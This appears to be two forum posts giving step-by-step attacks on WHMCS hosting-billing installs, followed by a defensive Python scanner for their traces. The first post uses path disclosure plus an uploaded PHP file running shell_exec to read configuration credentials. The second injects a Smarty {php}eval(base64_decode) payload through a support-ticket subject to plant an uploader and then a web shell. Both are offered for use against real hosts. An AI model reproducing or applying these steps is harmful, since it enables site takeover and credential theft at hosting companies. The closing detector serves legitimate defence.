You might need to spend a bit of money if you want this to work.
Go to your nulled host.
Append the following after their WHMCS directory (for example www.resellerrocket.com/am/)
includes/api/acceptorder.php
So the URL is now http://www.resellerrocket.com/am/inc…cceptorder.php
Now, legit WHMCS has an extra check here and will not show the error. However, if it is nulled, the check is removed and you get the info you need:
Warning: main(ROOTDIR/includes/orderfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/reseller/public_html/am/includes/api/acceptorder.php on line 0
Warning: main(ROOTDIR/includes/orderfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/reseller/public_html/am/includes/api/acceptorder.php on line 0
Fatal error: main() [function.require]: Failed opening required 'ROOTDIR/includes/orderfunctions.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/reseller/public_html/am/includes/api/acceptorder.php on line 0
Now, get hosting with them. Once you have it, upload a PHP file with these contents:
<?php
echo '<h1>WHMCS Pwner</h1>';
echo '<hr />';
echo '<pre>';
echo shell_exec('cat /home/reseller/public_html/am/configuration.php');
echo '</pre>';
echo '<hr />';
?>
Now open it in your browser and if it works you will now have the username and password for it.
Enjoy.
Credit to timestandstill on HF
I just recently patched my version; however, for most people who have nulled versions, this would be a good way to compromise them. This is for educational purposes only. If you have WHMCS, you may want to consider patching it.
This exploit wasn't found by me. I received numerous tickets with this code and decoded it to find out where the location was and such. I hope you enjoy and learn something from this.
(If you try this at my hosting company, you'll see I have a sense of humor.)
Step 1. In a support ticket, put this in the subject line:
{php}eval(base64_decode('[encoded payload removed]'));{/php}
Put anything in the message line.
Step 2. Look in hostingsiteurl.com/billingsystem/templates_c/red.php (there should be an uploader).
Step 3. You could upload a shell and compromise the whole site.
I hope I explained this. Let me know your thoughts.
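For anyone running WHMCS, both posts leave traces that can be searched for. The following is an added example, not part of either post and not WHMCS code: it flags direct requests to includes/api/*.php, HTTP requests for .php files under templates_c/, and ticket subjects carrying a Smarty {php} tag or eval(base64_decode(. The Common Log Format input and all sample data are constructed assumptions.

```python
import re

# Indicators taken from the two posts above; log format and sample data are constructed.
DIRECT_API = re.compile(r"/includes/api/[^/\s?]+\.php", re.I)
TEMPLATES_C_PHP = re.compile(r"/templates_c/[^\s?]+\.php", re.I)
SMARTY_PHP_TAG = re.compile(r"\{\s*php\s*\}", re.I)
ENCODED_EVAL = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
# Request and status fields of a Common Log Format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def scan_access_log(lines):
    """Return (line_no, reason, path) for requests matching the posts' indicators."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        path, status = m.group(1), m.group(2)
        if DIRECT_API.search(path):
            hits.append((n, "direct-api-include", path))
        elif TEMPLATES_C_PHP.search(path):
            # A 200 means a script in the compiled-template directory was served.
            reason = "templates_c-php-served" if status == "200" else "templates_c-php-probe"
            hits.append((n, reason, path))
    return hits


def scan_ticket_subjects(subjects):
    """Return indexes of ticket subjects carrying a Smarty {php} tag or encoded eval."""
    return [i for i, s in enumerate(subjects)
            if SMARTY_PHP_TAG.search(s) or ENCODED_EVAL.search(s)]


# Constructed sample data (not from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2012:10:00:00 +0000] "GET /am/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2012:10:00:05 +0000] "GET /am/includes/api/acceptorder.php HTTP/1.1" 200 612',
    '198.51.100.9 - - [01/Jan/2012:10:02:11 +0000] "GET /billingsystem/templates_c/red.php HTTP/1.1" 200 310',
    '198.51.100.9 - - [01/Jan/2012:10:02:30 +0000] "GET /billingsystem/templates_c/x.php HTTP/1.1" 404 0',
]
SAMPLE_SUBJECTS = ["Invoice question", "{php}eval(base64_decode('...'));{/php}", "Domain transfer"]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
    print(scan_ticket_subjects(SAMPLE_SUBJECTS))
```

A served .php file under templates_c/ is the strongest of these signals, since compiled templates in that directory are not meant to be requested over HTTP.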